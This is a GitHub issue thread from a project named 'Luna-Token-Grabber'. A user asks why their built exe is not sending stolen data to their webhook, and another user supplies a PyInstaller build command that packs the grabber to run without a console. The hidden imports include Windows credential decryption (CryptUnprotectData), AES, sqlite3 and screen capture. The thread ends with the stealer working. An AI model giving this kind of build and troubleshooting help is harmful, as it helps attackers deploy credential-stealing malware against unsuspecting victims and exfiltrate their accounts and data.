### ISSUE TITLE
built exe files not running properly

### ISSUE THREAD

**Issue by shitweenie13** [Smug246/Luna-Token-Grabber#113]
Any time i run the built exe, I get an error (fake error is disabled for the built exe)

Build an exe and attempt to run it

i expected the info to be sent to my webhook, but no matter how many times i try, it gives the same error and sends nothing to my webhook.

![image](https://user-images.githubusercontent.com/124006993/215625503-329a1ef9-f430-4f5e-9200-64d3841d9c03.png)

**Comment by Blank-c** [comment]
Try to replace your line 428 of builder.pyw with this 
```py
os.system(f"python -m PyInstaller --onefile --clean --noconsole --upx-dir=./tools --distpath ./ --hidden-import base64 --hidden-import ctypes --hidden-import json --hidden-import re --hidden-import time --hidden-import subprocess --hidden-import sys --hidden-import sqlite3 --hidden-import requests_toolbelt --hidden-import threading --hidden-import shutil.copy2 --hidden-import argv --hidden-import zipfile.ZIP_DEFLATED --hidden-import zipfile.ZipFile --hidden-import psutil --hidden-import PIL --hidden-import PIL.ImageGrab --hidden-import Crypto --hidden-import requests --hidden-import Crypto.Cipher.AES --hidden-import win32crypt --hidden-import win32crypt.CryptUnprotectData --icon {exeicon} .\\{filename}.py")
```

**Comment by shitweenie13** [comment]
Just tried doing that and the error has now changed to this:
![image](https://user-images.githubusercontent.com/124006993/215634811-47238e15-b1de-42ad-8f1b-e8bb96ce1cb2.png)

**Comment by Blank-c** [comment]
in cmd type `pip install requests-toolbelt`

**Comment by shitweenie13** [comment]
just did that and retried, it gives the same error and cmd says requirements already satisfied

**Comment by shitweenie13** [comment]
nvm it works now i had to rebuild the file, ty for the help sir

**Comment by Blank-c** [comment]
👍👌

**Comment by Smug246** [comment]
> Try to replace your line 428 of builder.pyw with this
> 
> ```python
> os.system(f"python -m PyInstaller --onefile --clean --noconsole --upx-dir=./tools --distpath ./ --hidden-import base64 --hidden-import ctypes --hidden-import json --hidden-import re --hidden-import time --hidden-import subprocess --hidden-import sys --hidden-import sqlite3 --hidden-import requests_toolbelt --hidden-import threading --hidden-import shutil.copy2 --hidden-import argv --hidden-import zipfile.ZIP_DEFLATED --hidden-import zipfile.ZipFile --hidden-import psutil --hidden-import PIL --hidden-import PIL.ImageGrab --hidden-import Crypto --hidden-import requests --hidden-import Crypto.Cipher.AES --hidden-import win32crypt --hidden-import win32crypt.CryptUnprotectData --icon {exeicon} .\\{filename}.py")
> ```

the requests_toolbelt is already added so idk why he needs this

**Comment by Blank-c** [comment]
> > Try to replace your line 428 of builder.pyw with this
> > ```python
> > os.system(f"python -m PyInstaller --onefile --clean --noconsole --upx-dir=./tools --distpath ./ --hidden-import base64 --hidden-import ctypes --hidden-import json --hidden-import re --hidden-import time --hidden-import subprocess --hidden-import sys --hidden-import sqlite3 --hidden-import requests_toolbelt --hidden-import threading --hidden-import shutil.copy2 --hidden-import argv --hidden-import zipfile.ZIP_DEFLATED --hidden-import zipfile.ZipFile --hidden-import psutil --hidden-import PIL --hidden-import PIL.ImageGrab --hidden-import Crypto --hidden-import requests --hidden-import Crypto.Cipher.AES --hidden-import win32crypt --hidden-import win32crypt.CryptUnprotectData --icon {exeicon} .\\{filename}.py")
> > ```
> 
> the requests_toolbelt is already added so idk why he needs this

the original requests library is still required.
